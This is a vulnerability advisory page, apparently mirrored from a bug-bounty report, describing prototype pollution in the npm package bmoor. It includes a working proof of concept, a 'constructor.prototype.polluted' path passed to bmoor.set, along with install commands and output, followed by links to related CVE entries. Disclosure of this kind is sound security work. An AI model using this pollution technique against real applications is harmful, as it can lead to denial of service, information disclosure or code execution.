Lucene search
Mohanl0l1-NPM-BMOORHistoryNov 18, 2020 - 12:00 a.m.
Prototype Pollution in b-heilman/bmoor
2020-11-1800:00:00
mohanl0l
www.huntr.dev
9
0.004 Low
EPSS
Percentile
74.9%
Description
bmoor is vulnerable to Prototype Pollution.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
- Create the following PoC file:
// poc.js
const bmoor = require('bmoor');
var obj = {}
console.log("Before : " + {}.polluted);
bmoor.set(obj,"constructor.prototype.polluted","Yes! Its Polluted");
console.log("After : " + {}.polluted);
- Execute the following commands in another terminal:
npm i bmoor # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
Related
cvelist
cvelist
CVE-2020-7736 Prototype Pollution
2020-10-02 00:00:00
CVE-2021-23558 Prototype Pollution
2022-01-28 00:00:00
prion
prion
Code injection
2020-10-02 10:15:00
Design/Logic Flaw
2022-01-28 22:15:00
github
github
Prototype Pollution in bmoor
2021-05-10 18:37:26
Prototype Pollution in bmoor
2022-02-01 00:50:09
cve
cve
CVE-2020-7736
2020-10-02 10:15:12
CVE-2021-23558
2022-01-28 22:15:09
osv
osv
Prototype Pollution in bmoor
2021-05-10 18:37:26
CVE-2020-7736
2020-10-02 10:15:12
Prototype Pollution in bmoor
2022-02-01 00:50:09
nvd
nvd
CVE-2020-7736
2020-10-02 10:15:12
CVE-2021-23558
2022-01-28 22:15:09
veracode
veracode
Prototype Pollution
2020-10-05 04:54:04
Prototype Pollution
2022-01-31 10:47:46